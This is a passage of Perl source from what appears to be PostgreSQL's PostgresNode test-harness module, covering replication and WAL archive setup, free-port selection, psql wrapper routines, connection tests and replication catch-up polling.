my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $logfile = $self->logfile;
my $name = $self->name;
local %ENV = $self->_get_env();
print "### Rotating log in node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-l', $logfile,
'logrotate');
return;
}
# Internal routine to enable streaming replication on a standby node.
sub enable_streaming
{
my ($self, $root_node) = @_;
my $root_connstr = $root_node->connstr;
my $name = $self->name;
print "### Enabling streaming replication for node \"$name\"\n";
$self->append_conf(
'postgresql.conf', qq(
primary_conninfo='$root_connstr'
));
$self->set_standby_mode();
return;
}
# Internal routine to enable archive recovery command on a standby node
sub enable_restoring
{
my ($self, $root_node, $standby) = @_;
my $path = TestLib::perl2host($root_node->archive_dir);
my $name = $self->name;
print "### Enabling WAL restore for node \"$name\"\n";
# On Windows, the path specified in the restore command needs to use
# double back-slashes to work properly and to be able to detect properly
# the file targeted by the copy command, so the directory value used
# in this routine, using only one back-slash, need to be properly changed
# first. Paths also need to be double-quoted to prevent failures where
# the path contains spaces.
$path =~ s{\\}{\\\\}g if ($TestLib::windows_os);
my $copy_command =
$TestLib::windows_os
? qq{copy "$path\\\\%f" "%p"}
: qq{cp "$path/%f" "%p"};
$self->append_conf(
'postgresql.conf', qq(
restore_command = '$copy_command'
));
if ($standby)
{
$self->set_standby_mode();
}
else
{
$self->set_recovery_mode();
}
return;
}
=pod
=item $node->set_recovery_mode()
Place recovery.signal file.
=cut
sub set_recovery_mode
{
my ($self) = @_;
$self->append_conf('recovery.signal', '');
return;
}
=pod
=item $node->set_standby_mode()
Place standby.signal file.
=cut
sub set_standby_mode
{
my ($self) = @_;
$self->append_conf('standby.signal', '');
return;
}
# Internal routine to enable archiving
sub enable_archiving
{
my ($self) = @_;
my $path = TestLib::perl2host($self->archive_dir);
my $name = $self->name;
print "### Enabling WAL archiving for node \"$name\"\n";
# On Windows, the path specified in the restore command needs to use
# double back-slashes to work properly and to be able to detect properly
# the file targeted by the copy command, so the directory value used
# in this routine, using only one back-slash, need to be properly changed
# first. Paths also need to be double-quoted to prevent failures where
# the path contains spaces.
$path =~ s{\\}{\\\\}g if ($TestLib::windows_os);
my $copy_command =
$TestLib::windows_os
? qq{copy "%p" "$path\\\\%f"}
: qq{cp "%p" "$path/%f"};
# Enable archive_mode and archive_command on node
$self->append_conf(
'postgresql.conf', qq(
archive_mode = on
archive_command = '$copy_command'
));
return;
}
# Internal method
sub _update_pid
{
my ($self, $is_running) = @_;
my $name = $self->name;
# If we can open the PID file, read its first line and that's the PID we
# want.
if (open my $pidfile, '<', $self->data_dir . "/postmaster.pid")
{
chomp($self->{_pid} = <$pidfile>);
print "# Postmaster PID for node \"$name\" is $self->{_pid}\n";
close $pidfile;
# If we found a pidfile when there shouldn't be one, complain.
BAIL_OUT("postmaster.pid unexpectedly present") unless $is_running;
return;
}
$self->{_pid} = undef;
print "# No postmaster PID for node \"$name\"\n";
# Complain if we expected to find a pidfile.
BAIL_OUT("postmaster.pid unexpectedly not present") if $is_running;
return;
}
=pod
=item PostgresNode->get_new_node(node_name, %params)
Build a new object of class C<PostgresNode> (or of a subclass, if you have
one), assigning a free port number. Remembers the node, to prevent its port
number from being reused for another node, and to ensure that it gets
shut down when the test script exits.
You should generally use this instead of C<PostgresNode::new(...)>.
=over
=item port => [1,65535]
By default, this function assigns a port number to each node. Specify this to
force a particular port number. The caller is responsible for evaluating
potential conflicts and privilege requirements.
=item own_host => 1
By default, all nodes use the same PGHOST value. If specified, generate a
PGHOST specific to this node. This allows multiple nodes to use the same
port.
=item install_path => '/path/to/postgres/installation'
Using this parameter is it possible to have nodes pointing to different
installations, for testing different versions together or the same version
with different build parameters. The provided path must be the parent of the
installation's 'bin' and 'lib' directories. In the common case where this is
not provided, Postgres binaries will be found in the caller's PATH.
=back
For backwards compatibility, it is also exported as a standalone function,
which can only create objects of class C<PostgresNode>.
=cut
sub get_new_node
{
my $class = 'PostgresNode';
$class = shift if scalar(@_) % 2 != 1;
my ($name, %params) = @_;
# Select a port.
my $port;
if (defined $params{port})
{
$port = $params{port};
}
else
{
# When selecting a port, we look for an unassigned TCP port number,
# even if we intend to use only Unix-domain sockets. This is clearly
# necessary on $use_tcp (Windows) configurations, and it seems like a
# good idea on Unixen as well.
$port = get_free_port();
}
# Select a host.
my $host = $test_pghost;
if ($params{own_host})
{
if ($use_tcp)
{
$last_host_assigned++;
$last_host_assigned > 254 and BAIL_OUT("too many own_host nodes");
$host = '127.0.0.' . $last_host_assigned;
}
else
{
$host = "$test_pghost/$name"; # Assume $name =~ /^[-_a-zA-Z0-9]+$/
mkdir $host;
}
}
# Lock port number found by creating a new node
my $node = $class->new($name, $host, $port);
if ($params{install_path})
{
$node->{_install_path} = $params{install_path};
}
# Add node to list of nodes
push(@all_nodes, $node);
$node->_set_pg_version;
my $v = $node->{_pg_version};
carp("PostgresNode isn't fully compatible with version " . $v)
if $v < 12;
return $node;
}
# Private routine to run the pg_config binary found in our environment (or in
# our install_path, if we have one), and set the version from it
#
sub _set_pg_version
{
my ($self) = @_;
my $inst = $self->{_install_path};
my $pg_config = "pg_config";
if (defined $inst)
{
# If the _install_path is invalid, our PATH variables might find an
# unrelated pg_config executable elsewhere. Sanity check the
# directory.
BAIL_OUT("directory not found: $inst")
unless -d $inst;
# If the directory exists but is not the root of a postgresql
# installation, or if the user configured using
# --bindir=$SOMEWHERE_ELSE, we're not going to find pg_config, so
# complain about that, too.
$pg_config = "$inst/bin/pg_config";
BAIL_OUT("pg_config not found: $pg_config")
unless -e $pg_config;
BAIL_OUT("pg_config not executable: $pg_config")
unless -x $pg_config;
# Leave $pg_config install_path qualified, to be sure we get the right
# version information, below, or die trying
}
local %ENV = $self->_get_env();
# We only want the version field
my $version_line = qx{$pg_config --version};
BAIL_OUT("$pg_config failed: $!") if $?;
$self->{_pg_version} = PostgresVersion->new($version_line);
BAIL_OUT("could not parse pg_config --version output: $version_line")
unless defined $self->{_pg_version};
}
# Private routine to return a copy of the environment with the PATH and
# (DY)LD_LIBRARY_PATH correctly set when there is an install path set for
# the node.
#
# Routines that call Postgres binaries need to call this routine like this:
#
# local %ENV = $self->_get_env{[%extra_settings]);
#
# A copy of the environment is taken and node's host and port settings are
# added as PGHOST and PGPORT, Then the extra settings (if any) are applied.
# Any setting in %extra_settings with a value that is undefined is deleted
# the remainder are# set. Then the PATH and (DY)LD_LIBRARY_PATH are adjusted
# if the node's install path is set, and the copy environment is returned.
#
# The install path set in get_new_node needs to be a directory containing
# bin and lib subdirectories as in a standard PostgreSQL installation, so this
# can't be used with installations where the bin and lib directories don't have
# a common parent directory.
sub _get_env
{
my $self = shift;
my %inst_env = (%ENV, PGHOST => $self->{_host}, PGPORT => $self->{_port});
# the remaining arguments are modifications to make to the environment
my %mods = (@_);
while (my ($k, $v) = each %mods)
{
if (defined $v)
{
$inst_env{$k} = "$v";
}
else
{
delete $inst_env{$k};
}
}
# now fix up the new environment for the install path
my $inst = $self->{_install_path};
if ($inst)
{
if ($TestLib::windows_os)
{
# Windows picks up DLLs from the PATH rather than *LD_LIBRARY_PATH
# choose the right path separator
if ($Config{osname} eq 'MSWin32')
{
$inst_env{PATH} = "$inst/bin;$inst/lib;$ENV{PATH}";
}
else
{
$inst_env{PATH} = "$inst/bin:$inst/lib:$ENV{PATH}";
}
}
else
{
my $dylib_name =
$Config{osname} eq 'darwin'
? "DYLD_LIBRARY_PATH"
: "LD_LIBRARY_PATH";
$inst_env{PATH} = "$inst/bin:$ENV{PATH}";
if (exists $ENV{$dylib_name})
{
$inst_env{$dylib_name} = "$inst/lib:$ENV{$dylib_name}";
}
else
{
$inst_env{$dylib_name} = "$inst/lib";
}
}
}
return (%inst_env);
}
# Private routine to get an installation path qualified command.
#
# IPC::Run maintains a cache, %cmd_cache, mapping commands to paths. Tests
# which use nodes spanning more than one postgres installation path need to
# avoid confusing which installation's binaries get run. Setting $ENV{PATH} is
# insufficient, as IPC::Run does not check to see if the path has changed since
# caching a command.
sub installed_command
{
my ($self, $cmd) = @_;
# Nodes using alternate installation locations use their installation's
# bin/ directory explicitly
return join('/', $self->{_install_path}, 'bin', $cmd)
if defined $self->{_install_path};
# Nodes implicitly using the default installation location rely on IPC::Run
# to find the right binary, which should not cause %cmd_cache confusion,
# because no nodes with other installation paths do it that way.
return $cmd;
}
=pod
=item get_free_port()
Locate an unprivileged (high) TCP port that's not currently bound to
anything. This is used by get_new_node, and is also exported for use
by test cases that need to start other, non-Postgres servers.
Ports assigned to existing PostgresNode objects are automatically
excluded, even if those servers are not currently running.
XXX A port available now may become unavailable by the time we start
the desired service.
=cut
sub get_free_port
{
my $found = 0;
my $port = $last_port_assigned;
while ($found == 0)
{
# advance $port, wrapping correctly around range end
$port = 49152 if ++$port >= 65536;
print "# Checking port $port\n";
# Check first that candidate port number is not included in
# the list of already-registered nodes.
$found = 1;
foreach my $node (@all_nodes)
{
$found = 0 if ($node->port == $port);
}
# Check to see if anything else is listening on this TCP port.
# Seek a port available for all possible listen_addresses values,
# so callers can harness this port for the widest range of purposes.
# The 0.0.0.0 test achieves that for MSYS, which automatically sets
# SO_EXCLUSIVEADDRUSE. Testing 0.0.0.0 is insufficient for Windows
# native Perl (https://stackoverflow.com/a/14388707), so we also
# have to test individual addresses. Doing that for 127.0.0/24
# addresses other than 127.0.0.1 might fail with EADDRNOTAVAIL on
# non-Linux, non-Windows kernels.
#
# Thus, 0.0.0.0 and individual 127.0.0/24 addresses are tested
# only on Windows and only when TCP usage is requested.
if ($found == 1)
{
foreach my $addr (qw(127.0.0.1),
($use_tcp && $TestLib::windows_os)
? qw(127.0.0.2 127.0.0.3 0.0.0.0)
: ())
{
if (!can_bind($addr, $port))
{
$found = 0;
last;
}
}
}
}
print "# Found port $port\n";
# Update port for next time
$last_port_assigned = $port;
return $port;
}
# Internal routine to check whether a host:port is available to bind
sub can_bind
{
my ($host, $port) = @_;
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $proto = getprotobyname("tcp");
socket(SOCK, PF_INET, SOCK_STREAM, $proto)
or die "socket failed: $!";
# As in postmaster, don't use SO_REUSEADDR on Windows
setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
unless $TestLib::windows_os;
my $ret = bind(SOCK, $paddr) && listen(SOCK, SOMAXCONN);
close(SOCK);
return $ret;
}
# Automatically shut down any still-running nodes (in the same order the nodes
# were created in) when the test script exits.
END
{
# take care not to change the script's exit value
my $exit_code = $?;
foreach my $node (@all_nodes)
{
$node->teardown_node;
# skip clean if we are requested to retain the basedir
next if defined $ENV{'PG_TEST_NOCLEAN'};
# clean basedir on clean test invocation
$node->clean_node if $exit_code == 0 && TestLib::all_tests_passing();
}
$? = $exit_code;
}
=pod
=item $node->teardown_node()
Do an immediate stop of the node
=cut
sub teardown_node
{
my $self = shift;
$self->stop('immediate');
return;
}
=pod
=item $node->clean_node()
Remove the base directory of the node if the node has been stopped.
=cut
sub clean_node
{
my $self = shift;
rmtree $self->{_basedir} unless defined $self->{_pid};
return;
}
=pod
=item $node->safe_psql($dbname, $sql) => stdout
Invoke B<psql> to run B<sql> on B<dbname> and return its stdout on success.
Die if the SQL produces an error. Runs with B<ON_ERROR_STOP> set.
Takes optional extra params like timeout and timed_out parameters with the same
options as psql.
=cut
sub safe_psql
{
my ($self, $dbname, $sql, %params) = @_;
local %ENV = $self->_get_env();
my ($stdout, $stderr);
my $ret = $self->psql(
$dbname, $sql,
%params,
stdout => \$stdout,
stderr => \$stderr,
on_error_die => 1,
on_error_stop => 1);
# psql can emit stderr from NOTICEs etc
if ($stderr ne "")
{
print "#### Begin standard error\n";
print $stderr;
print "\n#### End standard error\n";
}
return $stdout;
}
=pod
=item $node->psql($dbname, $sql, %params) => psql_retval
Invoke B<psql> to execute B<$sql> on B<$dbname> and return the return value
from B<psql>, which is run with on_error_stop by default so that it will
stop running sql and return 3 if the passed SQL results in an error.
As a convenience, if B<psql> is called in array context it returns an
array containing ($retval, $stdout, $stderr).
psql is invoked in tuples-only unaligned mode with reading of B<.psqlrc>
disabled. That may be overridden by passing extra psql parameters.
stdout and stderr are transformed to UNIX line endings if on Windows. Any
trailing newline is removed.
Dies on failure to invoke psql but not if psql exits with a nonzero
return code (unless on_error_die specified).
If psql exits because of a signal, an exception is raised.
=over
=item stdout => \$stdout
B<stdout>, if given, must be a scalar reference to which standard output is
written. If not given, standard output is not redirected and will be printed
unless B<psql> is called in array context, in which case it's captured and
returned.
=item stderr => \$stderr
Same as B<stdout> but gets standard error. If the same scalar is passed for
both B<stdout> and B<stderr> the results may be interleaved unpredictably.
=item on_error_stop => 1
By default, the B<psql> method invokes the B<psql> program with ON_ERROR_STOP=1
set, so SQL execution is stopped at the first error and exit code 3 is
returned. Set B<on_error_stop> to 0 to ignore errors instead.
=item on_error_die => 0
By default, this method returns psql's result code. Pass on_error_die to
instead die with an informative message.
=item timeout => 'interval'
Set a timeout for the psql call as an interval accepted by B<IPC::Run::timer>
(integer seconds is fine). This method raises an exception on timeout, unless
the B<timed_out> parameter is also given.
=item timed_out => \$timed_out
If B<timeout> is set and this parameter is given, the scalar it references
is set to true if the psql call times out.
=item connstr => B<value>
If set, use this as the connection string for the connection to the
backend.
=item replication => B<value>
If set, add B<replication=value> to the conninfo string.
Passing the literal value C<database> results in a logical replication
connection.
=item extra_params => ['--single-transaction']
If given, it must be an array reference containing additional parameters to B<psql>.
=back
e.g.
my ($stdout, $stderr, $timed_out);
my $cmdret = $node->psql('postgres', 'SELECT pg_sleep(600)',
stdout => \$stdout, stderr => \$stderr,
timeout => 180, timed_out => \$timed_out,
extra_params => ['--single-transaction'])
will set $cmdret to undef and $timed_out to a true value.
$node->psql('postgres', $sql, on_error_die => 1);
dies with an informative message if $sql fails.
=cut
sub psql
{
my ($self, $dbname, $sql, %params) = @_;
local %ENV = $self->_get_env();
my $stdout = $params{stdout};
my $stderr = $params{stderr};
my $replication = $params{replication};
my $timeout = undef;
my $timeout_exception = 'psql timed out';
# Build the connection string.
my $psql_connstr;
if (defined $params{connstr})
{
$psql_connstr = $params{connstr};
}
else
{
$psql_connstr = $self->connstr($dbname);
}
$psql_connstr .= defined $replication ? " replication=$replication" : "";
my @psql_params = (
$self->installed_command('psql'),
'-XAtq', '-d', $psql_connstr, '-f', '-');
# If the caller wants an array and hasn't passed stdout/stderr
# references, allocate temporary ones to capture them so we
# can return them. Otherwise we won't redirect them at all.
if (wantarray)
{
if (!defined($stdout))
{
my $temp_stdout = "";
$stdout = \$temp_stdout;
}
if (!defined($stderr))
{
my $temp_stderr = "";
$stderr = \$temp_stderr;
}
}
$params{on_error_stop} = 1 unless defined $params{on_error_stop};
$params{on_error_die} = 0 unless defined $params{on_error_die};
push @psql_params, '-v', 'ON_ERROR_STOP=1' if $params{on_error_stop};
push @psql_params, @{ $params{extra_params} }
if defined $params{extra_params};
$timeout =
IPC::Run::timeout($params{timeout}, exception => $timeout_exception)
if (defined($params{timeout}));
${ $params{timed_out} } = 0 if defined $params{timed_out};
# IPC::Run would otherwise append to existing contents:
$$stdout = "" if ref($stdout);
$$stderr = "" if ref($stderr);
my $ret;
# Run psql and capture any possible exceptions. If the exception is
# because of a timeout and the caller requested to handle that, just return
# and set the flag. Otherwise, and for any other exception, rethrow.
#
# For background, see
# https://metacpan.org/pod/release/ETHER/Try-Tiny-0.24/lib/Try/Tiny.pm
do
{
local $@;
eval {
my @ipcrun_opts = (\@psql_params, '<', \$sql);
push @ipcrun_opts, '>', $stdout if defined $stdout;
push @ipcrun_opts, '2>', $stderr if defined $stderr;
push @ipcrun_opts, $timeout if defined $timeout;
IPC::Run::run @ipcrun_opts;
$ret = $?;
};
my $exc_save = $@;
if ($exc_save)
{
# IPC::Run::run threw an exception. re-throw unless it's a
# timeout, which we'll handle by testing is_expired
die $exc_save
if (blessed($exc_save)
|| $exc_save !~ /^\Q$timeout_exception\E/);
$ret = undef;
die "Got timeout exception '$exc_save' but timer not expired?!"
unless $timeout->is_expired;
if (defined($params{timed_out}))
{
${ $params{timed_out} } = 1;
}
else
{
die "psql timed out: stderr: '$$stderr'\n"
. "while running '@psql_params'";
}
}
};
# Note: on Windows, IPC::Run seems to convert \r\n to \n in program output
# if we're using native Perl, but not if we're using MSys Perl. So do it
# by hand in the latter case, here and elsewhere.
if (defined $$stdout)
{
$$stdout =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp $$stdout;
}
if (defined $$stderr)
{
$$stderr =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp $$stderr;
}
# See http://perldoc.perl.org/perlvar.html#%24CHILD_ERROR
# We don't use IPC::Run::Simple to limit dependencies.
#
# We always die on signal.
my $core = $ret & 128 ? " (core dumped)" : "";
die "psql exited with signal "
. ($ret & 127)
. "$core: '$$stderr' while running '@psql_params'"
if $ret & 127;
$ret = $ret >> 8;
if ($ret && $params{on_error_die})
{
die "psql error: stderr: '$$stderr'\nwhile running '@psql_params'"
if $ret == 1;
die "connection error: '$$stderr'\nwhile running '@psql_params'"
if $ret == 2;
die
"error running SQL: '$$stderr'\nwhile running '@psql_params' with sql '$sql'"
if $ret == 3;
die "psql returns $ret: '$$stderr'\nwhile running '@psql_params'";
}
if (wantarray)
{
return ($ret, $$stdout, $$stderr);
}
else
{
return $ret;
}
}
=pod
=item $node->background_psql($dbname, \$stdin, \$stdout, $timer, %params) => harness
Invoke B<psql> on B<$dbname> and return an IPC::Run harness object, which the
caller may use to send input to B<psql>. The process's stdin is sourced from
the $stdin scalar reference, and its stdout and stderr go to the $stdout
scalar reference. This allows the caller to act on other parts of the system
while idling this backend.
The specified timer object is attached to the harness, as well. It's caller's
responsibility to select the timeout length, and to restart the timer after
each command if the timeout is per-command.
psql is invoked in tuples-only unaligned mode with reading of B<.psqlrc>
disabled. That may be overridden by passing extra psql parameters.
Dies on failure to invoke psql, or if psql fails to connect. Errors occurring
later are the caller's problem. psql runs with on_error_stop by default so
that it will stop running sql and return 3 if passed SQL results in an error.
Be sure to "finish" the harness when done with it.
=over
=item on_error_stop => 1
By default, the B<psql> method invokes the B<psql> program with ON_ERROR_STOP=1
set, so SQL execution is stopped at the first error and exit code 3 is
returned. Set B<on_error_stop> to 0 to ignore errors instead.
=item replication => B<value>
If set, add B<replication=value> to the conninfo string.
Passing the literal value C<database> results in a logical replication
connection.
=item extra_params => ['--single-transaction']
If given, it must be an array reference containing additional parameters to B<psql>.
=back
=cut
sub background_psql
{
my ($self, $dbname, $stdin, $stdout, $timer, %params) = @_;
local %ENV = $self->_get_env();
my $replication = $params{replication};
my @psql_params = (
$self->installed_command('psql'),
'-XAtq',
'-d',
$self->connstr($dbname)
. (defined $replication ? " replication=$replication" : ""),
'-f',
'-');
$params{on_error_stop} = 1 unless defined $params{on_error_stop};
push @psql_params, '-v', 'ON_ERROR_STOP=1' if $params{on_error_stop};
push @psql_params, @{ $params{extra_params} }
if defined $params{extra_params};
# Ensure there is no data waiting to be sent:
$$stdin = "" if ref($stdin);
# IPC::Run would otherwise append to existing contents:
$$stdout = "" if ref($stdout);
my $harness = IPC::Run::start \@psql_params,
'<', $stdin, '>', $stdout, $timer;
# Request some output, and pump until we see it. This means that psql
# connection failures are caught here, relieving callers of the need to
# handle those. (Right now, we have no particularly good handling for
# errors anyway, but that might be added later.)
my $banner = "background_psql: ready";
$$stdin = "\\echo $banner\n";
pump $harness until $$stdout =~ /$banner/ || $timer->is_expired;
die "psql startup timed out" if $timer->is_expired;
return $harness;
}
=pod
=item $node->interactive_psql($dbname, \$stdin, \$stdout, $timer, %params) => harness
Invoke B<psql> on B<$dbname> and return an IPC::Run harness object,
which the caller may use to send interactive input to B<psql>.
The process's stdin is sourced from the $stdin scalar reference,
and its stdout and stderr go to the $stdout scalar reference.
ptys are used so that psql thinks it's being called interactively.
The specified timer object is attached to the harness, as well.
It's caller's responsibility to select the timeout length, and to
restart the timer after each command if the timeout is per-command.
psql is invoked in tuples-only unaligned mode with reading of B<.psqlrc>
disabled. That may be overridden by passing extra psql parameters.
Dies on failure to invoke psql, or if psql fails to connect.
Errors occurring later are the caller's problem.
Be sure to "finish" the harness when done with it.
The only extra parameter currently accepted is
=over
=item extra_params => ['--single-transaction']
If given, it must be an array reference containing additional parameters to B<psql>.
=back
This requires IO::Pty in addition to IPC::Run.
=cut
sub interactive_psql
{
my ($self, $dbname, $stdin, $stdout, $timer, %params) = @_;
local %ENV = $self->_get_env();
my @psql_params = (
$self->installed_command('psql'),
'-XAt', '-d', $self->connstr($dbname));
push @psql_params, @{ $params{extra_params} }
if defined $params{extra_params};
# Ensure there is no data waiting to be sent:
$$stdin = "" if ref($stdin);
# IPC::Run would otherwise append to existing contents:
$$stdout = "" if ref($stdout);
my $harness = IPC::Run::start \@psql_params,
'<pty<', $stdin, '>pty>', $stdout, $timer;
# Pump until we see psql's help banner. This ensures that callers
# won't write anything to the pty before it's ready, avoiding an
# implementation issue in IPC::Run. Also, it means that psql
# connection failures are caught here, relieving callers of
# the need to handle those. (Right now, we have no particularly
# good handling for errors anyway, but that might be added later.)
pump $harness
until $$stdout =~ /Type "help" for help/ || $timer->is_expired;
die "psql startup timed out" if $timer->is_expired;
return $harness;
}
=pod
=item $node->connect_ok($connstr, $test_name, %params)
Attempt a connection with a custom connection string. This is expected
to succeed.
=over
=item sql => B<value>
If this parameter is set, this query is used for the connection attempt
instead of the default.
=item expected_stdout => B<value>
If this regular expression is set, matches it with the output generated.
=item log_like => [ qr/required message/ ]
If given, it must be an array reference containing a list of regular
expressions that must match against the server log, using
C<Test::More::like()>.
=item log_unlike => [ qr/prohibited message/ ]
If given, it must be an array reference containing a list of regular
expressions that must NOT match against the server log. They will be
passed to C<Test::More::unlike()>.
=back
=cut
sub connect_ok
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my ($self, $connstr, $test_name, %params) = @_;
my $sql;
if (defined($params{sql}))
{
$sql = $params{sql};
}
else
{
$sql = "SELECT \$\$connected with $connstr\$\$";
}
my (@log_like, @log_unlike);
if (defined($params{log_like}))
{
@log_like = @{ $params{log_like} };
}
if (defined($params{log_unlike}))
{
@log_unlike = @{ $params{log_unlike} };
}
my $log_location = -s $self->logfile;
# Never prompt for a password, any callers of this routine should
# have set up things properly, and this should not block.
my ($ret, $stdout, $stderr) = $self->psql(
'postgres',
$sql,
extra_params => ['-w'],
connstr => "$connstr",
on_error_stop => 0);
is($ret, 0, $test_name);
if (defined($params{expected_stdout}))
{
like($stdout, $params{expected_stdout}, "$test_name: matches");
}
if (@log_like or @log_unlike)
{
my $log_contents = TestLib::slurp_file($self->logfile, $log_location);
while (my $regex = shift @log_like)
{
like($log_contents, $regex, "$test_name: log matches");
}
while (my $regex = shift @log_unlike)
{
unlike($log_contents, $regex, "$test_name: log does not match");
}
}
}
=pod
=item $node->connect_fails($connstr, $test_name, %params)
Attempt a connection with a custom connection string. This is expected
to fail.
=over
=item expected_stderr => B<value>
If this regular expression is set, matches it with the output generated.
=item log_like => [ qr/required message/ ]
=item log_unlike => [ qr/prohibited message/ ]
See C<connect_ok(...)>, above.
=back
=cut
sub connect_fails
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my ($self, $connstr, $test_name, %params) = @_;
my (@log_like, @log_unlike);
if (defined($params{log_like}))
{
@log_like = @{ $params{log_like} };
}
if (defined($params{log_unlike}))
{
@log_unlike = @{ $params{log_unlike} };
}
my $log_location = -s $self->logfile;
# Never prompt for a password, any callers of this routine should
# have set up things properly, and this should not block.
my ($ret, $stdout, $stderr) = $self->psql(
'postgres',
undef,
extra_params => ['-w'],
connstr => "$connstr");
isnt($ret, 0, $test_name);
if (defined($params{expected_stderr}))
{
like($stderr, $params{expected_stderr}, "$test_name: matches");
}
if (@log_like or @log_unlike)
{
my $log_contents = TestLib::slurp_file($self->logfile, $log_location);
while (my $regex = shift @log_like)
{
like($log_contents, $regex, "$test_name: log matches");
}
while (my $regex = shift @log_unlike)
{
unlike($log_contents, $regex, "$test_name: log does not match");
}
}
}
=pod
=item $node->poll_query_until($dbname, $query [, $expected ])
Run B<$query> repeatedly, until it returns the B<$expected> result
('t', or SQL boolean true, by default).
Continues polling if B<psql> returns an error result.
Times out after 180 seconds.
Returns 1 if successful, 0 if timed out.
=cut
sub poll_query_until
{
my ($self, $dbname, $query, $expected) = @_;
local %ENV = $self->_get_env();
$expected = 't' unless defined($expected); # default value
my $cmd = [
$self->installed_command('psql'), '-XAt',
'-d', $self->connstr($dbname)
];
my ($stdout, $stderr);
my $max_attempts = 180 * 10;
my $attempts = 0;
while ($attempts < $max_attempts)
{
my $result = IPC::Run::run $cmd, '<', \$query,
'>', \$stdout, '2>', \$stderr;
$stdout =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp($stdout);
$stderr =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp($stderr);
if ($stdout eq $expected && $stderr eq '')
{
return 1;
}
# Wait 0.1 second before retrying.
usleep(100_000);
$attempts++;
}
# The query result didn't change in 180 seconds. Give up. Print the
# output from the last attempt, hopefully that's useful for debugging.
diag qq(poll_query_until timed out executing this query:
$query
expecting this output:
$expected
last actual query output:
$stdout
with stderr:
$stderr);
return 0;
}
=pod
=item $node->command_ok(...)
Runs a shell command like TestLib::command_ok, but with PGHOST and PGPORT set
so that the command will default to connecting to this PostgresNode.
=cut
sub command_ok
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_ok(@_);
return;
}
=pod
=item $node->command_fails(...)
TestLib::command_fails with our connection parameters. See command_ok(...)
=cut
sub command_fails
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_fails(@_);
return;
}
=pod
=item $node->command_like(...)
TestLib::command_like with our connection parameters. See command_ok(...)
=cut
sub command_like
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_like(@_);
return;
}
=pod
=item $node->command_checks_all(...)
TestLib::command_checks_all with our connection parameters. See
command_ok(...)
=cut
sub command_checks_all
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_checks_all(@_);
return;
}
=pod
=item $node->issues_sql_like(cmd, expected_sql, test_name)
Run a command on the node, then verify that $expected_sql appears in the
server log file.
=cut
sub issues_sql_like
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my ($self, $cmd, $expected_sql, $test_name) = @_;
local %ENV = $self->_get_env();
my $log_location = -s $self->logfile;
my $result = TestLib::run_log($cmd);
ok($result, "@$cmd exit code 0");
my $log = TestLib::slurp_file($self->logfile, $log_location);
like($log, $expected_sql, "$test_name: SQL found in server log");
return;
}
=pod
=item $node->run_log(...)
Runs a shell command like TestLib::run_log, but with connection parameters set
so that the command will default to connecting to this PostgresNode.
=cut
sub run_log
{
my $self = shift;
local %ENV = $self->_get_env();
TestLib::run_log(@_);
return;
}
=pod
=item $node->lsn(mode)
Look up WAL locations on the server:
* insert location (primary only, error on replica)
* write location (primary only, error on replica)
* flush location (primary only, error on replica)
* receive location (always undef on primary)
* replay location (always undef on primary)
mode must be specified.
=cut
sub lsn
{
my ($self, $mode) = @_;
my %modes = (
'insert' => 'pg_current_wal_insert_lsn()',
'flush' => 'pg_current_wal_flush_lsn()',
'write' => 'pg_current_wal_lsn()',
'receive' => 'pg_last_wal_receive_lsn()',
'replay' => 'pg_last_wal_replay_lsn()');
$mode = '<undef>' if !defined($mode);
croak "unknown mode for 'lsn': '$mode', valid modes are "
. join(', ', keys %modes)
if !defined($modes{$mode});
my $result = $self->safe_psql('postgres', "SELECT $modes{$mode}");
chomp($result);
if ($result eq '')
{
return;
}
else
{
return $result;
}
}
=pod
=item $node->wait_for_catchup(standby_name, mode, target_lsn)
Wait for the node with application_name standby_name (usually from node->name,
also works for logical subscriptions)
until its replication location in pg_stat_replication equals or passes the
upstream's WAL insert point at the time this function is called. By default
the replay_lsn is waited for, but 'mode' may be specified to wait for any of
sent|write|flush|replay. The connection catching up must be in a streaming
state.
If there is no active replication connection from this peer, waits until
poll_query_until timeout.
Requires that the 'postgres' db exists and is accessible.
target_lsn may be any arbitrary lsn, but is typically $primary_node->lsn('insert').
If omitted, pg_current_wal_lsn() is used.
This is not a test. It die()s on failure.
=cut
sub wait_for_catchup
{
my ($self, $standby_name, $mode, $target_lsn) = @_;
$mode = defined($mode) ? $mode : 'replay';
my %valid_modes =
('sent' => 1, 'write' => 1, 'flush' => 1, 'replay' => 1);
croak "unknown mode $mode for 'wait_for_catchup', valid modes are "
. join(', ', keys(%valid_modes))
unless exists($valid_modes{$mode});
# Allow passing of a PostgresNode instance as shorthand
if (blessed($standby_name) && $standby_name->isa("PostgresNode"))
{
$standby_name = $standby_name->name;
}
my $lsn_expr;
if (defined($target_lsn))
{
$lsn_expr = "'$target_lsn'";
}
else
{
$lsn_expr = 'pg_current_wal_lsn()';
}
print "Waiting for replication conn "
. $standby_name . "'s "
. $mode
. "_lsn to pass "
. $lsn_expr . " on "
. $self->name . "\n";
my $query =
qq[SELECT $lsn_expr <= ${mode}_lsn AND state = 'streaming' FROM pg_catalog.pg_stat_replication WHERE application_name = '$standby_name';];
$self->poll_query_until('postgres', $query)
or croak "timed out waiting for catchup";
print "done\n";
return;
}
=pod
=item $node->wait_for_slot_catchup(slot_name, mode, target_lsn)
Wait for the named replication slot to equal or pass the supplied target_lsn.
The location used is the restart_lsn unless mode is given, in which case it may
be 'restart' or 'confirmed_flush'.
Requires that the 'postgres' db exists and is accessible.
This is not a test. It die()s on failure.
If the slot is not active, will time out after poll_query_until's timeout.
